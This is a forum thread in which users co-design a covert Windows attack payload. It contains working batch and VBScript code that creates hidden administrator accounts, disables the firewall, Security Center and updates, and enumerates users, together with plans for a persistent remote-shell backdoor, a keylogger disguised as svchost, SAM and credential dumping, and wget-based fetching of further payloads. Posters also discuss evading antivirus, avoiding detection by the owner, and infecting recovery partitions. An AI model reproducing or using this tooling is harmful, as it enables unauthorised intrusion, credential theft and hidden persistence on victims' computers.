Jump to content

New payload idea


DingleBerries
 Share

Recommended Posts

So Ive been contemplating making a new payload for a while... These are some of the things that I want to inplement:

1. No .VBS or .NET

2. Mostly command line, and the .BATs will all be .EXEs, just because i like those better

3. Dump SAM or create a New admin, via command line, preferable both

4. Install a remote shell, this part is already take care of

5. Dump a list of all users on the computer

And thats about it. The remote shell autoruns and adds itself to the registry. I want to keep this as small and as basic as possible.. So there isnt any slurping of docs and what not, maybe pics ;). The dumping part will be done via command lin, ie. run rs.exe, because the shell copies its self onces its ran. Other than that i have a good keylogger, runs low on mem and can be customized... Right now I am still looking for ideas, so if you have any let me know.

This is the code that will be used for the Admin account.

Invisible User:Tiny

@echo off
net user Tiny password /add && net localgroup administrators Tiny /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "Tiny"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
attrib +r +a +s +h %SystemDrive%\docume~1\Tiny
Exit

Also I am thinking of just dumping the .reg ot HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ because it contains all the users, that way we can limit 3rd party software. Like so:

REGEDIT /E EDIT_PATH_OF_DRIVE\FILE.REG "HKEY_LOCAL\----"

Disable Windows Firewall:

@echo off
net stop "Security Center"
net stop SharedAccess
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f

Link to comment
Share on other sites

So Ive been contemplating making a new payload for a while... These are some of the things that I want to inplement:

1. No .VBS or .NET

2. Mostly command line, and the .BATs will all be .EXEs, just because i like those better

3. Dump SAM or create a New admin, via command line, preferable both

4. Install a remote shell, this part is already take care of

5. Dump a list of all users on the computer

And thats about it. The remote shell autoruns and adds itself to the registry. I want to keep this as small and as basic as possible.. So there isnt any slurping of docs and what not, maybe pics ;). The dumping part will be done via command lin, ie. run rs.exe, because the shell copies its self onces its ran. Other than that i have a good keylogger, runs low on mem and can be customized... Right now I am still looking for ideas, so if you have any let me know.

i been thinking of trying to write it in python... and also maybe reworking the tools of thepayload to be just scritps then the entire thing can be made an exe

Link to comment
Share on other sites

So Ive been contemplating making a new payload for a while... These are some of the things that I want to inplement:

1. No .VBS or .NET

2. Mostly command line, and the .BATs will all be .EXEs, just because i like those better

3. Dump SAM or create a New admin, via command line, preferable both

4. Install a remote shell, this part is already take care of

5. Dump a list of all users on the computer

And thats about it. The remote shell autoruns and adds itself to the registry. I want to keep this as small and as basic as possible.. So there isnt any slurping of docs and what not, maybe pics ;). The dumping part will be done via command lin, ie. run rs.exe, because the shell copies its self onces its ran. Other than that i have a good keylogger, runs low on mem and can be customized... Right now I am still looking for ideas, so if you have any let me know.

For the point 5. you can execute this code, it's in VbScript. Of course, it can be moddified to show only the users and not the groups...

UsersGroups.vbs

'UsersGroups.vbs
'This script enumerates users, grouped for each local group in a computer
'It creates a new file called users.txt in the same directory from it's executed.
'The code has been rebuilded from a similar app, but it works fine
'DMilton for free community
'Thread post at http://hak5.org/forums/index.php?showtopic=10746

'Variables explicit declaration
Option Explicit 
 Dim obj_UserName 
 Dim obj_GroupName 
 Dim obj_PC 
 Dim obj_Group 
 Dim obj_Shell 
 Dim str_PC 
 Dim str_Name
 Dim objFSO
 Dim objTextFile
 Dim I
 Dim ExitFile
 Const ForReading = 1, ForWriting = 2, ForAppending = 8
'Arguments
 ExitFile = "users.txt"
'Exit file creation
 Set objFSO = CreateObject("Scripting.FileSystemObject")
 Set objTextFile = objFSO.OpenTextFile (ExitFile, ForWriting, True)
'Local computer var creation str_Name
 str_PC = "." 
 Set obj_Shell = CreateObject("WScript.Shell") 
 str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%")
'Creates an object obj_PC containing actual local computer 
 Set obj_PC = GetObject("WinNT://" & str_PC & ",Computer") 
 ObjTextFile.WriteLine("Computer name is: " & str_Name) 
'Now we filter objects to obtain groups
 obj_PC.Filter = Array("Group") 
'Going through the objects and writting the txt 
 For Each obj_GroupName In obj_PC 
     'Creating an object obj_Group containing actual group
      Set obj_Group = GetObject("WinNT://" & str_PC & "/" & obj_GroupName.Name & ",Group") 
      'Writting the txt and formatting it
      objTextFile.WriteLine("Users from Group: " & obj_GroupName.Name) 
      'Filtering objects from the group to obtain users
       obj_Group.members.Filter = Array("User") 
      'Printing each one user
       For Each obj_UserName In obj_Group.members
            objTextFile.WriteLine("                  " & obj_UserName.Name)
       Next
Next 
'Cleaning the variables
 Set obj_UserName = Nothing 
 Set obj_GroupName = Nothing 
 Set obj_PC = Nothing 
 Set obj_Shell = Nothing

Moreover, I think that with groups info in the final users.txt, adding a key in registry for creating an admin account is simple, or not?

net user "USBAdmin" /add
net localgroup administrator "USBAdmin" /add
net user "USBAdmin" password

The problem with adding privileges is that this automation would work in English versions but not in other languages as Spanish, where Administrators group is named Administradores, but with the listed groups in the vbs, you can extract easily the "Admin"-istrator or "Admin"-istradores correct word to add the correct privileges.

Finaly, it would be necessary, adding the "USBAdmin" to the Special Account Users List, by adding a DWORD 0 to the created "USBAdmin" by executing in a batch (or whatelse). In this case, from command line would be...

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v USBAdmin /t REG_DWORD /d 0

:P

Link to comment
Share on other sites

part of my idea of writing the payload in python would be cross platform compatible... what i been thinking of doing too is writing a bunch of scripts in python that would be included on a minimal distribution of Linux to do administrative tasks on a windows machine all this could be included on a boot cd or boot usb drive... so the payload could be run on a machine on reboot... it would be far more complicated then the current switchblade... and would probably have a name like machete... so in the end the payload could be run from windows on insertion or if you booted from the stick it would load linux text only and grab all the same info from windows...

so if anyone likes this idea let me know... also is there anyone that knows enough python to assist?

Link to comment
Share on other sites

I'm cleaning the code you posted, doing it efficient in any instalation language system, adding some other and it will be posted as soon as I have it working right.

Thats awesome, thank you very much. I am still reviewing what it is exactly that I want, i.e. to include the keylogger. There would not be a need for the logs to be sent off because you could transfer it via remote shell. Another thing i was considering is the "guest trick". Where when logged on via guest a batch script containing instruction to create an admin account is placed in the admins startup folder. If that is modified to allow RDP then we can install the shell via RDP when the owner is away from their desk.. Just throwing things out there :).

Link to comment
Share on other sites

Thats awesome, thank you very much. I am still reviewing what it is exactly that I want, i.e. to include the keylogger. There would not be a need for the logs to be sent off because you could transfer it via remote shell. Another thing i was considering is the "guest trick". Where when logged on via guest a batch script containing instruction to create an admin account is placed in the admins startup folder. If that is modified to allow RDP then we can install the shell via RDP when the owner is away from their desk.. Just throwing things out there :).

i been tweaking some of the autoIT code for the remote switchblade..using psexec.exe i was successfully running it on a remote computer you still need domain admin rights and thers the issue of what user account the programs are run under... so im looking at other methods of information retrieval. But the payload executes fine and logs to the remote computer fine.

The payload i was running just outputs the results to stdout

so basically. Theres an exe payload.exe

then theres a bat file i created to run the payload with psexec.exe \\remotecomputer -u admin -p password payload.exe

Then open a command prompt and type payload.bat > output.log

This can and will all be scripted correctly later but for testing purposes it works fine.

but it would be easy enough to tailor this to setup a reverse backdoor and etc...

my only complaint is that we are still tied down to these nirsoft programs which are not open source.

In the long run i'd like to get some of this password dumping code released as open source and rewritten in different languages. Also the limitation of the nirsoft programs is that they only dump information of the currently logged on user.

Link to comment
Share on other sites

The back door is open source. Its from white scorpion and will, hopefully, be custom once the final version of this is out.. I really just want something that quick and painless. All the vnc stuff is a waste of time and is easily detected by smart admins. Once the computer is owned with the back door then we can start doing other things, transferring logs, installing other backdoors, ect.

So far these are the only programs that will be needed:

White-Scorpions Tiny back door- that is unless I find a better one

Custom keylogger - C++ runs low on memory, I would like to either hide it from process manager or masquerade it as "svchost" or the like.

Wget - so that other files can be snatched from a host and executed, no need to revisit the computer.

There are a few more things that I am looking at, I am coming close to the last weeks of class so studying and what not are my priorities atm. However these are things I am considering:

creddump

Root Kits hidden in the microprocessor?

PWDumpX v1.4

Sysinternals Shit:

Ctrl2Cap v2.0 - Interested in this for maybe a new keylogger

PhysMem- Dumps Ram to hex

RegHide - Maybe useful in haiding the new admin account

Of course all of these can be hosted on some remote server, be sure that you do it anonymously as to not get caught, and just use wget. you would have to wait till late at night as to not set off the owner to any of your activities.

P.S. sorry i dumped all this here, I am just making sure I do not lose or forget anything.

Link to comment
Share on other sites

Some quick thoughts (I'm short on time so we can delve into specifics via PM if you want):

* We can stop security center, but instead of modifying the registry why not use the netsh commands to disable the firewall? fewer fingerprints on the system and less likely to be caught by AV/antispyware. Even better, why not just punch a hole in the firewall with netsh for our listener?

* We can use the net user command to add the user to system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints!

* we can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host based IDS type progs.

*Cain and Abel is pretty good at decrypting the LSA secrets.

Link to comment
Share on other sites

Some quick thoughts (I'm short on time so we can delve into specifics via PM if you want):

* We can stop security center, but instead of modifying the registry why not use the netsh commands to disable the firewall? fewer fingerprints on the system and less likely to be caught by AV/antispyware. Even better, why not just punch a hole in the firewall with netsh for our listener?

* We can use the net user command to add the user to system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints!

* we can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host based IDS type progs.

*Cain and Abel is pretty good at decrypting the LSA secrets.

I like all of those, the only problem i see is Can&Abel getting caught by virus scan. I really like punching a hole in the FW, i really didnt wat to disable it completely.

Also I am going to use your idea of the .dat file in the root directory, but instead i want to contaminate the recovery partition, that way even if they do reinstall the payload will remain there... im still working on this part. But what it will probably look for is a file specific to the recovery partition.

Link to comment
Share on other sites

Thats awesome, thank you very much. I am still reviewing what it is exactly that I want, i.e. to include the keylogger. There would not be a need for the logs to be sent off because you could transfer it via remote shell. Another thing i was considering is the "guest trick". Where when logged on via guest a batch script containing instruction to create an admin account is placed in the admins startup folder. If that is modified to allow RDP then we can install the shell via RDP when the owner is away from their desk.. Just throwing things out there :).

Meanwhile you decide what the payload should do, I've been playing with some your firsts ideas.

Executing it, will extract the Administrators group name in a sure way for any installation language or even if the user is experimented and has changed it to a variable that can be used by the called batch. The idea of using a batch called program is to continue in the batch way you mentioned, but because I don't know how extract the real Administrators Group name in command line, I did it in VbScript, ready to use.

By the way, here it is the code for the VbScript

'ListAdminGroup.vbs
Set objWshNetwork = CreateObject("WScript.Network") 
Set objShell = CreateObject("Wscript.Shell")
Set objEnv = objShell.Environment("PROCESS")
str_PC = objWshNetwork.ComputerName 
' SID of the Administrators group
str_GroupSID = "S-1-5-32-544"
str_GroupName = GetGroupName(str_PC, str_GroupSID) 
Set obj_Group = GetObject("WinNT://" & str_PC & "/" _ 
& str_GroupName & ",group")
objEnv("AdminGroup") = str_GroupName
strPath = "start.bat"
objShell.Run strPath, 1, False

Function GetGroupName(sComputer, sGroupSID) 
Dim oGroupAccounts, oGroupAccount 
'Set for WinXP
Set oGroupAccounts = GetObject( _ 
"winmgmts://" & sComputer & "/root/cimv2") _ 
.ExecQuery("Select Name from Win32_Group" _ 
& " WHERE Domain = '" & sComputer & "' AND SID = '" & sGroupSID & "'") 
'For Win2k we use the 'BUILTIN' domain
If oGroupAccounts.Count = 0 Then 
    Set oGroupAccounts = GetObject( _ 
    "winmgmts://" & sComputer & "/root/cimv2") _ 
    .ExecQuery("Select Name from Win32_Group" _ 
    & " WHERE Domain = 'BUILTIN' AND SID = '" & sGroupSID & "'") 
End If 
For Each oGroupAccount In oGroupAccounts 
    GetGroupName = oGroupAccount.Name 
Next 
End Function

I think it will work in Windows XP and Windows 2000 but if you can play with it in other versions, will be great.

Once the script has finished, it launches the start.bat batch. It will create an administrator account wich name is defined in %NewAdmin% variable, with a password given by %password% variable, and adding it into Administrators Group, using the variable in %AdminGroup% given by the vbs. Creates the correct folder, hides it, and add the new account name to the Special Accounts, for being invisible to the user.

Here it is the start.bat code. By the way, it must be on same dir as VbScript.

::start.bat
@echo off
set NewAdmin=USBAdmin
set password=YouWasHacked!
set Folder=%SystemDrive%\Documents and Settings\%NewAdmin%
net localgroup %AdminGroup% %NewAdmin% /add
net user %NewAdmin% %password% /add
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NewAdmin% /t REG_DWORD /d 0
mkdir "%Folder%"
attrib +a +s +h "%Folder%"

It will solve too the Tcstool for fewer fingerprints:

* We can use the net user command to add the user to system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints!

About Tcstool quesion:

* we can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host based IDS type progs.

The code for Users.vbs can be:

'Users.vbs
Option Explicit 


Dim obj_UserName 
Dim obj_GroupName 
Dim obj_PC 
Dim obj_Group 
Dim obj_Shell 
Dim str_Computer 
Dim str_Name
Dim objFSO
Dim objTextFile
Dim str_File
Dim M
Const ForReading = 1, ForWriting = 2, ForAppending = 8

If WScript.Arguments.count > 0 Then
    str_File = WScript.Arguments.item(0)
Else
    str_File = "users.txt"
End If
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile (str_File, ForWriting, True)
str_Computer = "." 
Set obj_Shell = CreateObject("WScript.Shell") 
str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%") 
Set obj_PC = GetObject("WinNT://" & str_Computer & ",Computer") 
obj_PC.Filter = Array("Group") 
For Each obj_GroupName In obj_PC
    Set obj_Group = GetObject("WinNT://" & str_Computer & "/" & obj_GroupName.Name & ",Group") 
    obj_Group.members.Filter = Array("User") 
    For Each obj_UserName In obj_Group.members
        set M = obj_UserName 
        objTextFile.WriteLine(obj_UserName.Name)   
    Next 
Next

It will extract all users names in a new users.txt file, for further use of it.

And that's all by the momment! :lol:

Link to comment
Share on other sites

Meanwhile you decide what the payload should do, I've been playing with some your firsts ideas.

Executing it, will extract the Administrators group name in a sure way for any installation language or even if the user is experimented and has changed it to a variable that can be used by the called batch. The idea of using a batch called program is to continue in the batch way you mentioned, but because I don't know how extract the real Administrators Group name in command line, I did it in VbScript, ready to use.

I have already compiled all the bats into an exe. I havent slept since 630 this morning, class and what not, so i didnt have the mind power to do any more.. check out the small one i have HERE. The next release will actually have substance to it.

Link to comment
Share on other sites

I like all of those, the only problem i see is Can&Abel getting caught by virus scan. I really like punching a hole in the FW, i really didnt wat to disable it completely.

Also I am going to use your idea of the .dat file in the root directory, but instead i want to contaminate the recovery partition, that way even if they do reinstall the payload will remain there... im still working on this part. But what it will probably look for is a file specific to the recovery partition.

I'm not saying we upload Cain & Abel to the local machine. You asked if it could be decrypted easily, and I was saying we could use it to work on our data back at our evil hacker lair after we've run the payload ;)

It will be hard to contaminate the recovery partitions because all the different PC vendors handle that partition differently. Maybe we should target Dells??? :-)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...